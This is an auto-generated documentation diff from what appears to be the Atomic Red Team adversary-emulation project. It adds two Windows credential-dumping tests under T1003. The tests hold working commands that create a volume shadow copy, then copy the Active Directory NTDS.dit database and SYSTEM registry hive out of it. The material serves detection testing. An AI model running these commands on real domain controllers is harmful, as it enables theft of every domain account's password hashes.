Generate docs from job=validate_atomics_generate_docs branch=master

atomics/T1003/T1003.md

@@ -151,6 +151,10 @@ The /proc filesystem on Linux contains a great deal of information regarding the
 
 - [Atomic Test #8 - Dump Active Directory Database with NTDSUtil](#atomic-test-8---dump-active-directory-database-with-ntdsutil)
 
+- [Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit](#atomic-test-9---create-volume-shadow-copy-with-ntdsdit)
+
+- [Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-10---copy-ntdsdit-from-volume-shadow-copy)
+
 
 <br/>
 
@@ -305,3 +309,46 @@ subsequent domain controllers without the need of network-based replication.
 ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
 ```
 <br/>
+<br/>
+
+## Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+
+#### Run it with `command_prompt`!
+```
+vssadmin.exe create shadow /for=#{drive_letter}
+```
+<br/>
+<br/>
+
+## Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
+A successful test also requires the export of the SYSTEM Registry hive. 
+This test must be executed on a Windows Domain Controller.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1|
+| extract_path | Path for extracted NTDS.dit | Path | C:\Extract|
+
+#### Run it with `command_prompt`!
+```
+copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
+copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
+reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
+```
+<br/>

atomics/index.md

@@ -506,6 +506,8 @@
   - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
   - Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
   - Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows]
+  - Atomic Test #9: Create Volume Shadow Copy with NTDS.dit [windows]
+  - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows]
 - [T1081 Credentials in Files](./T1081/T1081.md)
   - Atomic Test #1: Browser and System credentials [macos]
   - Atomic Test #2: Extract credentials from files [macos, linux]

atomics/index.yaml

@@ -14318,6 +14318,46 @@ credential-access:
         command: 'ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
 
 '
+    - name: Create Volume Shadow Copy with NTDS.dit
+      description: 'The Active Directory database NTDS.dit may be dumped by copying
+        it from a Volume Shadow Copy.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        drive_letter:
+          description: Drive letter to source VSC (including colon)
+          type: String
+          default: 'C:'
+      executor:
+        name: command_prompt
+        command: 'vssadmin.exe create shadow /for=#{drive_letter}
+
+'
+    - name: Copy NTDS.dit from Volume Shadow Copy
+      description: "The Active Directory database NTDS.dit may be dumped by copying
+        it from a Volume Shadow Copy.\n\nThis test requires steps taken in the test
+        \"Create Volume Shadow Copy with NTDS.dit\".\nA successful test also requires
+        the export of the SYSTEM Registry hive. \nThis test must be executed on a
+        Windows Domain Controller.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        vsc_name:
+          description: Name of Volume Shadow Copy
+          type: String
+          default: "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1"
+        extract_path:
+          description: Path for extracted NTDS.dit
+          type: Path
+          default: C:\Extract
+      executor:
+        name: command_prompt
+        command: |-
+          copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
+          copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
+          reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
   T1081:
     technique:
       external_references:

atomics/windows-index.md

@@ -342,6 +342,8 @@
   - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
   - Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
   - Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows]
+  - Atomic Test #9: Create Volume Shadow Copy with NTDS.dit [windows]
+  - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows]
 - [T1081 Credentials in Files](./T1081/T1081.md)
   - Atomic Test #3: Mimikatz & Kittenz [windows]
   - Atomic Test #4: Extracting credentials from files [windows]